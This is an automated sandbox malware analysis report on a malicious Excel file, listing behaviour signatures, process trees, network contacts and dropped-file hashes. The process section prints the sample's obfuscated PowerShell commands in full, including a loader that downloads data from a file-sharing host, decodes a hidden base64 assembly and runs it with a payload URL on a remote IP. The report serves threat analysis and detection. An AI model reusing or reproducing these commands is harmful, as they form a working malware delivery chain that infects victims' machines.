Malware Analysis Report

2024-12-07 16:36

Sample ID 241114-c1ezkawrfm
Target 62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls
SHA256 62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1
Tags
defense_evasion discovery execution
score
10/10

Analysis Overview

score
10/10

SHA256

62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1

Threat Level: Known bad

The file 62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Uses Volume Shadow Copy WMI provider

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 02:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 02:32

Reported

2024-11-14 02:34

Platform

win7-20240903-en

Max time kernel

138s

Max time network

138s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2808 wrote to memory of 2552 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe
PID 2552 wrote to memory of 1316 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2600 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2600 wrote to memory of 2360 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2552 wrote to memory of 2716 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\SysWOW64\WScript.exe
PID 2716 wrote to memory of 2728 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 2180 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe

"C:\Windows\sYStEm32\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe" "pOwerSHeLl.ExE -ex BYPasS -NOp -w 1 -c dEVIcECreDentIAldEplOYmEnT ; iex($(IEx('[sYSTEm.teXt.eNCoDING]'+[cHar]58+[ChaR]0X3a+'UTf8.getsTRiNg([sySTem.COnVERt]'+[CHaR]0X3a+[chAr]0X3A+'frombaSE64STrIng('+[chAR]0x22+'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'+[cHaR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPasS -NOp -w 1 -c dEVIcECreDentIAldEplOYmEnT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\maf3vcbx.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFDE0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFDDF.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemybestgirlthinkingsheisahotchickbutfu.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('LERimage'+'Url = '+'DjZhttps://1017.filemail.com/api/file/get?filek'+'ey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c6'+'2c'+'1730945176a0904f DjZ;LERwebCl'+'i'+'ent = New-Object System.Net.WebClient;LERimageBytes '+'= LERwebClient.DownloadDa'+'ta(LERimage'+'Url);LERimageText = [System.Text.Encoding]::UTF8.GetString(LE'+'Rimag'+'eByt'+'es);LERstartFlag = DjZ<<BA'+'SE64_START>>DjZ;LERendFlag = DjZ<<BASE64_END>>DjZ;LERstartIndex = LERimageText.IndexOf(LERstartFlag);LERendIndex = LERimageText.IndexOf(LERendF'+'lag);LERstartIndex -ge 0 -an'+'d LERendIndex -gt LERstartIndex;LERstartIndex += LERstar'+'tFlag.Length;LERbase64Length = LERendIndex - LERstartIndex;LERbase64Command ='+' LERimageText.Substring(LERstartIndex, LERba'+'se64Length);LERbase64Reversed = -join (LERbase64Com'+'mand.ToCharArray() i1B ForEach-Object { LER_ })[-1..-(LERbase64C'+'ommand.Length)];L'+'ERcommandBytes = [System.Convert]::FromBase64String(LERbase64Reversed);LERloadedAss'+'embly = [System.Ref'+'lect'+'io'+'n.Assembly]::L'+'oad(LERcommandB'+'ytes);LERvaiMethod '+'= [dnlib.IO.'+'Home].GetMethod(DjZVAIDjZ);LERvaiMethod.Invoke(LERnull, @(DjZtxt.RRFTRWS/66/92.022.3.291//:ptthDjZ, DjZdesativadoDjZ, DjZdesativ'+'a'+'d'+'oDjZ, DjZdesa'+'tivadoDjZ, DjZCasPolDjZ, DjZdesativadoDjZ, DjZdesativadoDjZ,DjZdesativadoDjZ,DjZde'+'sativadoDjZ,DjZdesativado'+'D'+'jZ,DjZdesativadoDjZ,DjZdesativad'+'oDjZ,DjZ1DjZ,DjZdesativ'+'adoDjZ));').rePLAcE(([cHAR]68+[cHAR]106+[cHAR]90),[String][cHAR]39).rePLAcE(([cHAR]76+[cHAR]69+[cHAR]82),[String][cHAR]36).rePLAcE('i1B','|') | & ( $sHElliD[1]+$sHElLID[13]+'x')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 88.221.134.137:80 r10.o.lencr.org tcp
US 192.3.220.29:80 192.3.220.29 tcp
KR 221.146.204.133:443 4t.gg tcp
US 192.3.220.29:80 192.3.220.29 tcp
US 8.8.8.8:53 1017.filemail.com udp
US 142.215.209.78:443 1017.filemail.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.157:80 crl.microsoft.com tcp

Files

memory/1688-1-0x0000000072ADD000-0x0000000072AE8000-memory.dmp

memory/1688-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2808-16-0x0000000000990000-0x0000000000992000-memory.dmp

memory/1688-17-0x00000000023F0000-0x00000000023F2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 78d6e86b532460d6aa20a01e6f65bafb
SHA1 400a85d03d57d70a88e0ce5a265d99d3c7222032
SHA256 580a78542645186ad5b5bbfc30c8dc8f82552a08de70e153f7736798ae56b4f2
SHA512 f7c1f250d3fd68b00cd96334de60d40dfbd0e5d36bfd1acdbaba922228aac2dc8013fd44df89da75122a155993cb8d570a4b6c7b36509f88802aa218055e8681

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 242d5065f90e2bc0c080bb9f6364c24c
SHA1 af40d248dbb2044abc0669d20e384838c48569a7
SHA256 6c5a2f0f49738a8fa4ce15c3fb8363d43d76a3cdc2dd6becc236af6e8a66d9ef
SHA512 acbabbf7f07be8f3a8e69f87ac56ca41719445666e153062b2d1aac68aace6bb12e58fc79822c9991eec227e3459556d8a31015ab2b56b155ae710d411520cd5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 dbd42366febab14b529a5cac9f7a8ef2
SHA1 794050d958135f690b60ff0a55604117a338c984
SHA256 76a0a60dba64de98b0a62cc85ea7374bfb4b069ee518c2f8b72353ba45d2ba79
SHA512 1b42c2328944b2c2333f63307cda81a73d9a03754a337e140ef0804eb93bcf31a4115fe32e57a69433d8349f885f0a4e302c796ee6adc6e8f86bbc6c10a3d066

C:\Users\Admin\AppData\Local\Temp\CabF48C.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\seemebestthingswhichevermadebybestthingsgodown[1].hta

MD5 57a19193272cc7755de490dccc3be05f
SHA1 d56fce9c08083a9d81fa7fda3df780908b5fab21
SHA256 8baaf9535735d987a40639a7fe7f78e85c0a8ece06b698d6ae4b740ec63690e2
SHA512 ca5149e249b74a159f489afaba983011c9e316ee1850eff2f053c2d3ff4736bc75feb2575e71de66d3889690f50d097041041d1aaa6cc8d8476c71f403032b82

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 93f1c4b43c2dc2059a6f2178529e81b0
SHA1 8f46e8c9befd7a5fd91c20688d318fe25560d877
SHA256 b04948ab214e176efb2c834369d7dbac7a9ab19dba288e57ded6f9cb3d84c273
SHA512 26a8ec7fd358aa712adca9ff6a38cca4f9b8e0a63d4b6a6dd3785647a80ca90323893c1709b9fecbdd9b4aaf0eb29d9d64e2df0734c95b09db0530940663efa8

\??\c:\Users\Admin\AppData\Local\Temp\maf3vcbx.cmdline

MD5 0a3e165a90496cc782a93ea67a87ee6b
SHA1 a6f4e8dd41a07673a2dba02dd386309181003dac
SHA256 54a94647adb74deb66bf9ad728bb8e867c87e514223b4fea2e5c97883624f778
SHA512 35942f1032082eff903e354e24e1b6337b2ed58455e9b4f3b1c80795cb972c3a4ccf3feb7d742e0b5b4fcf9332fd7eb54f95daa8610d542bd527d69009a08276

\??\c:\Users\Admin\AppData\Local\Temp\maf3vcbx.0.cs

MD5 70e878f483525e691692b50ba3aeadd0
SHA1 fa16b13bc12663af3d9a7e7dba4e027931cf9ccb
SHA256 3de2628d310015c0692133b3509877416f0c20159830c0d9ad45f10109f0bee8
SHA512 22cb839c634a7c5dc2c4b00c7c98aaa12bc4c3cc76a096e52004ede5b8f2b79e71670702f4a028b55bf2f411501dff4347cc1947fc345b32c8d957c2d9a31a05

\??\c:\Users\Admin\AppData\Local\Temp\CSCFDDF.tmp

MD5 b5a76fe4c0f7508091afb1d5532b8c55
SHA1 7c029a02bd102c8a5e4ece88805d17efbc0d70c9
SHA256 ed69485b9ce9b1b54f0a751645c0690e68971d0272caf232a7fad800100c055b
SHA512 d9b3be4021d2c1fcefc0664a52080fcc3030d11d0c65afbcb974fdaee9688429d0e4b33e634bf89a8bbd23bd82dab82f769d0936210015330574ba4f8c5c0a8d

C:\Users\Admin\AppData\Local\Temp\RESFDE0.tmp

MD5 9d6ad1d595b4ea437c13e1ac94916e37
SHA1 a3d7b69b455de984b0650bf3f2efc6ddc83459df
SHA256 c8c477209979296fbfccc5bd5e850bb402163035c0e196ede6a3b5fd5fdda647
SHA512 5a6bb923d6a906206369dd6ec7440b380583db0438192678a01b97bb35d9105a8bfe4e2ea8dcbc09b780f65d03dd3544b276075df3e92f4c85fc9e04306634bd

C:\Users\Admin\AppData\Local\Temp\maf3vcbx.dll

MD5 5797f9e629df47fda90e4647679f6205
SHA1 e2faf00dd1ffafcf17a74765d1a72e7a823696f4
SHA256 47ffe3bad8fd303da71605f4e8caea09a8bb160a1acfc6d2566d15cc4970428b
SHA512 0783b665545a39afe827e9b912a04ff16338b84e8f9acfd2c49bc5ed6870abe7bc932244160cb101938f864c73837b2ba1eca68bbaeddea41e53c6c061a4576c

C:\Users\Admin\AppData\Local\Temp\maf3vcbx.pdb

MD5 c8520981baaa0b724c44477738b32673
SHA1 3ecef25bea107b4083ad87dc7111c93f392c2e9c
SHA256 dad71dacf700bf8993c74d40e4d0c97caf8e97807b77cfc09780eec06399eb1b
SHA512 52a16ebc6074b5b5d42a6063678b49a39fd77941c2f78500e81e4192d34f4984fbd09bf9a3e850d377ff729662b437fcd3acee53c1f944747dd43b5931534d46

memory/1688-60-0x0000000072ADD000-0x0000000072AE8000-memory.dmp

C:\Users\Admin\AppData\Roaming\seemybestgirlthinkingsheisahotchickbutfu.vbS

MD5 b93e8a9bf23aeb31964d63d631ccf365
SHA1 05b27d7f62b142a9d88c6ab89eb8ffc5f2299bd4
SHA256 75a49d9f596717af29acad09533ed873c76d71ef857aa340e47a5605b209e63f
SHA512 46e5f392f462c69158443e1c26361e950452744240638375af4e3926f0b57eb2d0f58fea63a42f998e7da1776ee49cc993d67cc32c2b2aa5244476bc95654062

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 02:32

Reported

2024-11-14 02:34

Platform

win10v2004-20241007-en

Max time kernel

145s

Max time network

153s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 956 wrote to memory of 1500 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 88.221.135.106:80 r10.o.lencr.org tcp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 106.135.221.88.in-addr.arpa udp
US 192.3.220.29:80 192.3.220.29 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 29.220.3.192.in-addr.arpa udp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 5ca797b673195d888a1f1f8540f2e328
SHA1 a15790fe520ebd358bbaefa76c7215fea970c5c7
SHA256 9dbe318fc250e9b4016425c5b5d077916b7eb7220c299df089eb8ecd388772f5
SHA512 94b716ca87ad62978721ea9b278f4c7a8bb1bd7f493692f65d328242cf357def4572040e868b03632da1aa09e53ba6abaef35d58796601705ec4e58635857c91